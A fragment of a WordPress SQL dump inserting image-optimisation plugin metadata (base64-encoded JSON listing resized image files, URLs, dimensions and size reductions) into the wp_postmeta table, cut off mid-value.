INSERT INTO `wp_postmeta` VALUES (30061, 722, 'wpfc_optimisation_reduction', '20517'); 
INSERT INTO `wp_postmeta` VALUES (30062, 722, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDkuanBnIiwid2lkdGgiOjM0NTYsImhlaWdodCI6MjMwNCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MzczOSwiaWQiOiI3MjIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MTA2MSwidGltZSI6MTQ4MzU4Mzc0MywiaWQiOjcyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjE5MTgsInRpbWUiOjE0ODM1ODM3NDcsImlkIjo3MjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxODUxLCJ0aW1lIjoxNDgzNTgzNzUxLCJpZCI6NzIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo2MTQxLCJ0aW1lIjoxNDgzNTgzNzU3LCJpZCI6NzIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NzM1LCJ0aW1lIjoxNDgzNTgzNzYwLCJpZCI6NzIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTczLCJ0aW1lIjoxNDgzNTgzNzY0LCJpZCI6NzIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NzMxLCJ0aW1lIjoxNDgzNTgzNzY3LCJpZCI6NzIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTg2MywidGltZSI6MTQ4MzU4Mzc3MSwiaWQiOjcyMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NTY4LCJ0aW1lIjoxNDgzNTgzNzc0LCJpZCI6NzIyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo3ODksInRpbWUiOjE0ODM1ODM3NzgsImlkIjo3MjJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjExNzcsInRpbWUiOjE0ODM1ODM3ODEsImlkIjo3MjJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEzMTcsInRpbWUiOjE0ODM1ODM3ODUsImlkIjo3MjJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkyOTAxMjQ5LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MjkwMTI0OS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTI5MDEyNDktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjE3OTMsInRpbWUiOjE0ODM1ODM3ODksImlkIjo3MjJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30063, 718, 'wpfc_optimisation_reduction', '17147'); 
INSERT INTO `wp_postmeta` VALUES (30064, 718, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLmpwZyIsIndpZHRoIjo2MDAwLCJoZWlnaHQiOjM1MTAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODM3OTMsImlkIjoiNzE4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc4MSwidGltZSI6MTQ4MzU4Mzc5NywiaWQiOjcxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtODAweDQ2OC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjQ2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtODAweDQ2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtODAweDQ2OC5qcGciLCJyZWR1Y3Rpb24iOjE4NjYsInRpbWUiOjE0ODM1ODM4MDAsImlkIjo3MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTc2OHg0NDkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0NDksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTc2OHg0NDkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTc2OHg0NDkuanBnIiwicmVkdWN0aW9uIjoxNzM5LCJ0aW1lIjoxNDgzNTgzODA0LCJpZCI6NzE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185NzQwMTczMS0xNjAweDkzNi5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0Ijo5MzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTE2MDB4OTM2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185NzQwMTczMS0xNjAweDkzNi5qcGciLCJyZWR1Y3Rpb24iOjY4MjIsInRpbWUiOjE0ODM1ODM4MDgsImlkIjo3MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NTksInRpbWUiOjE0ODM1ODM4MTIsImlkIjo3MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0OTIsInRpbWUiOjE0ODM1ODM4MTUsImlkIjo3MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MzIsInRpbWUiOjE0ODM1ODM4MTgsImlkIjo3MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMzg0LCJ0aW1lIjoxNDgzNTgzODIyLCJpZCI6NzE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MzQsInRpbWUiOjE0ODM1ODM4MjYsImlkIjo3MTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ5MSwidGltZSI6MTQ4MzU4MzgyOSwiaWQiOjcxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185NzQwMTczMS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185NzQwMTczMS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185NzQwMTczMS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTgzLCJ0aW1lIjoxNDgzNTgzODM0LCJpZCI6NzE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2Nr